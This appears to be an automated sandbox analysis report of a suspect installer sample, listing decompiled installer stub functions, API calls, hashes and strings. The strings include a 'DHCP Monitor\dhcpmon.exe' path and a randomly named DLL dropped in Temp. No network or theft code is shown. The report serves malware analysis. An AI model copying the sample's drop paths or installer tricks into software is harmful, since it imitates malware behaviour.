Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N$Nw$B
API String ID: 3103080414-2029550883
Opcode ID: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
Instruction ID: c8b3317feb23aa92da8c88ca1c3cf39d399e1714613d550ff25a6b2d3c0ef38e
Opcode Fuzzy Hash: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
Instruction Fuzzy Hash: 3761A1B1A40209BFDB109F61CD45F6A3BA9FB84744F00443AFB05BA1D1D7BDA9618F98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f454;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Setup Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f448;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Setup Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C
Setup Setup, xrefs: 00401150

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Setup Setup
API String ID: 941294808-1602013819
Opcode ID: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
Instruction ID: 0ac27d016dd37b64d299d3f81b39716040336c4aee851974846d4d7042c5b915
Opcode Fuzzy Hash: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
Instruction Fuzzy Hash: CA419C71800249AFCF058FA5DE459AF7FB9FF44314F00802AF991AA1A0C778EA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00404763, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404763(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42a090;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040594D(0x3fb, _t146);
					E00406528(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040594D(0x3fb, _t146);
							if(E00405CD3(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E0040624D(0x429888, _t146);
							_t87 = E00406656(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040624D(0x429888, _t146);
								_t89 = E00405C7E(0x429888);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429888,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429888) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429888,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C2C(0x429888);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429888) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404BF7(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ec1c; // 0x77ec4e
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404BDF(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429878);
									} else {
										E00404B1A(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f504 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E004042F3(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a8a8 == _t158) {
									E004046BC();
								}
								 *0x42a8a8 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a8b8;
							_v60 = E00404AB4;
							_v56 = _t146;
							_v68 = E004062E0(_t146, 0x42a8b8, _t166, 0x429c90, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405BE5(_t146);
								_t125 =  *((intOrPtr*)( *0x42f454 + 0x11c));
								if( *((intOrPtr*)( *0x42f454 + 0x11c)) != 0 && _t146 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
									E004062E0(_t146, 0x42a8b8, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3e0, 0x42a8b8) != 0) {
										lstrcatA(_t146, 0x42e3e0);
									}
								}
								 *0x42a8a8 =  *0x42a8a8 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405C52(_t146) != 0 && E00405C7E(_t146) == 0) {
						E00405BE5(_t146);
					}
					 *0x42ec18 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004042D1(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042D1(_t166);
					E00404306(_t165);
					_t138 = E00406656(8);
					if(_t138 == 0) {
						L53:
						return E00404338(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}

APIs

GetDlgItem.USER32 ref: 004047B2
SetWindowTextA.USER32(00000000,?), ref: 004047DC
SHBrowseForFolderA.SHELL32(?,00429C90,?), ref: 0040488D
CoTaskMemFree.OLE32(00000000), ref: 00404898
lstrcmpiA.KERNEL32(Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,0042A8B8,00000000,?,?), ref: 004048CA
lstrcatA.KERNEL32(?,Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.), ref: 004048D6
SetDlgItemTextA.USER32 ref: 004048E8

Part of subcall function 0040594D: GetDlgItemTextA.USER32 ref: 00405960

Part of subcall function 00406528: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
Part of subcall function 00406528: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
Part of subcall function 00406528: CharNextA.USER32(?,"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
Part of subcall function 00406528: CharPrevA.USER32(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2

GetDiskFreeSpaceA.KERNEL32(00429888,?,?,0000040F,?,00429888,00429888,?,00000001,00429888,?,?,000003FB,?), ref: 004049A6
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049C1

Part of subcall function 00404B1A: lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
Part of subcall function 00404B1A: wsprintfA.USER32 ref: 00404BC0
Part of subcall function 00404B1A: SetDlgItemTextA.USER32 ref: 00404BD3

Strings

A, xrefs: 00404886
C:\Users\user\AppData\Local\Temp, xrefs: 004048B3
Nw, xrefs: 00404A1D
Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file., xrefs: 004048C4, 004048C9, 004048D4

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp$Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.$Nw
API String ID: 2624150263-257355252
Opcode ID: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
Instruction ID: b89c9f0b9ad2a5e463b1d4baa2297f7fe0657747611b748bc5d4715ca5df860c
Opcode Fuzzy Hash: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
Instruction Fuzzy Hash: A9A17DB1A00209ABDB11AFA5C941AAF77B8EF84314F14843BF601B62D1DB7C99518F6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405EBC, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EBC(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c648 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca48, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c248, "%s=%s\r\n", 0x42c648, 0x42ca48);
						_t53 = _t52 + 0x10;
						E004062E0(_t37, 0x400, 0x42ca48, 0x42ca48,  *((intOrPtr*)( *0x42f454 + 0x128)));
						_t12 = E00405DE6(0x42ca48, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405E5E(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405D4B(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405D4B(_t38, _t21 + 0xa, 0x40a3f0);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405DA1(_t24 + _t46, 0x42c248, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E8D(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DE6(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x42c648, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,0040604D,?,?), ref: 00405EED
GetShortPathNameA.KERNEL32 ref: 00405EF6

Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D

GetShortPathNameA.KERNEL32 ref: 00405F13
wsprintfA.USER32 ref: 00405F31
GetFileSize.KERNEL32(00000000,00000000,0042CA48,C0000000,00000004,0042CA48,?,?,?,?,?), ref: 00405F6C
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7B
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB3
SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,0042C248,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00406009
GlobalFree.KERNEL32 ref: 0040601A
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406021

Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,80000000,00000003), ref: 00405DEA
Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C

Strings

%s=%s, xrefs: 00405F27
[Rename], xrefs: 00405F9B, 00405FAD

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: 4151bb29c38b3ec919b1a0789aff65ba621a9168c6cb3f5890c8e46692059ba0
Instruction ID: 93867bad2f833244898b90dcbcfca195f0b3b673d55ab92eabf696d68ffba162
Opcode Fuzzy Hash: 4151bb29c38b3ec919b1a0789aff65ba621a9168c6cb3f5890c8e46692059ba0
Instruction Fuzzy Hash: 29310371640B16ABC2306B659D48F6B3A5CDF45758F14003BF942F62C2EA7CE8118AAD

Uniqueness

Uniqueness Score: -1.00%

Function 004062E0, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004062E0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x42ec1c; // 0x77ec4e
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x42f498;
				_t39 = 0x42e3e0;
				_t90 = 0x42e3e0;
				if(_a4 >= 0x42e3e0 && _a4 - 0x42e3e0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E004062E0(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x42e3e0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x430000;
							E0040624D(_t90, (_t97 << 0xa) + 0x430000);
						} else {
							E004061AB(_t90,  *0x42f448);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E00406528(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42f44c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4e4;
						if( *0x42f4e4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x42f444;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x42f448,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x42f448,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00406134((_t80 & 0x0000003f) +  *0x42f498, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f498, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004062E0(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E0040624D(_a4, _t39);
			}

APIs

GetSystemDirectoryA.KERNEL32 ref: 0040640B
GetWindowsDirectoryA.KERNEL32(Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,00000400,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040641E
SHGetSpecialFolderLocation.SHELL32(004053AC,00000000,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040645A
SHGetPathFromIDListA.SHELL32(00000000,Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.), ref: 00406468
CoTaskMemFree.OLE32(00000000), ref: 00406474
lstrcatA.KERNEL32(Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,\Microsoft\Internet Explorer\Quick Launch), ref: 00406498
lstrlenA.KERNEL32(Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,?,0042A098,00000000,004053AC,0042A098,00000000,00000000,00000000,00000000), ref: 004064EA

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406492
Software\Microsoft\Windows\CurrentVersion, xrefs: 004063DA
Nw, xrefs: 004062ED
Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file., xrefs: 0040630A, 004063D7, 004063D8, 004063D9, 004063F5, 0040640A, 0040641D, 00406439, 00406464, 00406497, 0040649D, 004064B5, 004064C8, 004064E3, 004064E9, 004064F1, 0040651B

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.$Nw$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-358415464
Opcode ID: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
Instruction ID: cb9956cf134697f00dd0045f5d81f520e4bdc76bf78ec342c260f9164b19bc27
Opcode Fuzzy Hash: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
Instruction Fuzzy Hash: 5F611571A00104AEEB219F64DD85BBE3BA4AB15314F56413FE903B62D1D37C89A2CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 77%

